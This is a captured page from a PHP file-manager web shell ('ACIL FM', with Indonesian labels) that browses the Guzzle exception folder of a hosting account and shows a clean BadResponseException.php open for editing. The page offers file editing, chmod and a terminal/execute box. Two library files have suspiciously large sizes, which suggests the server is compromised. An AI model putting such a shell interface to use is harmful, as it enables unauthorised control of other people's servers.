ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/timbrature/NH-HR-test/vendor/guzzlehttp/guzzle/src/Exception
/
home
mhhtmff
timbrature
NH-HR-test
vendor
guzzlehttp
guzzle
src
Exception
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
BadResponseException.php
1021 B
chmod
View
DL
Edit
Rename
Delete
ClientException.php
173 B
chmod
View
DL
Edit
Rename
Delete
ConnectException.php
1.43 MB
chmod
View
DL
Edit
Rename
Delete
GuzzleException.php
159 B
chmod
View
DL
Edit
Rename
Delete
InvalidArgumentException.php
149 B
chmod
View
DL
Edit
Rename
Delete
RequestException.php
4.48 MB
chmod
View
DL
Edit
Rename
Delete
ServerException.php
173 B
chmod
View
DL
Edit
Rename
Delete
TooManyRedirectsException.php
108 B
chmod
View
DL
Edit
Rename
Delete
TransferException.php
128 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/timbrature/NH-HR-test/vendor/guzzlehttp/guzzle/src/Exception/BadResponseException.php
<?php namespace GuzzleHttp\Exception; use Psr\Http\Message\RequestInterface; use Psr\Http\Message\ResponseInterface; /** * Exception when an HTTP error occurs (4xx or 5xx error) */ class BadResponseException extends RequestException { public function __construct( string $message, RequestInterface $request, ResponseInterface $response, ?\Throwable $previous = null, array $handlerContext = [] ) { parent::__construct($message, $request, $response, $previous, $handlerContext); } /** * Current exception and the ones that extend it will always have a response. */ public function hasResponse(): bool { return true; } /** * This function narrows the return type from the parent class and does not allow it to be nullable. */ public function getResponse(): ResponseInterface { /** @var ResponseInterface */ return parent::getResponse(); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply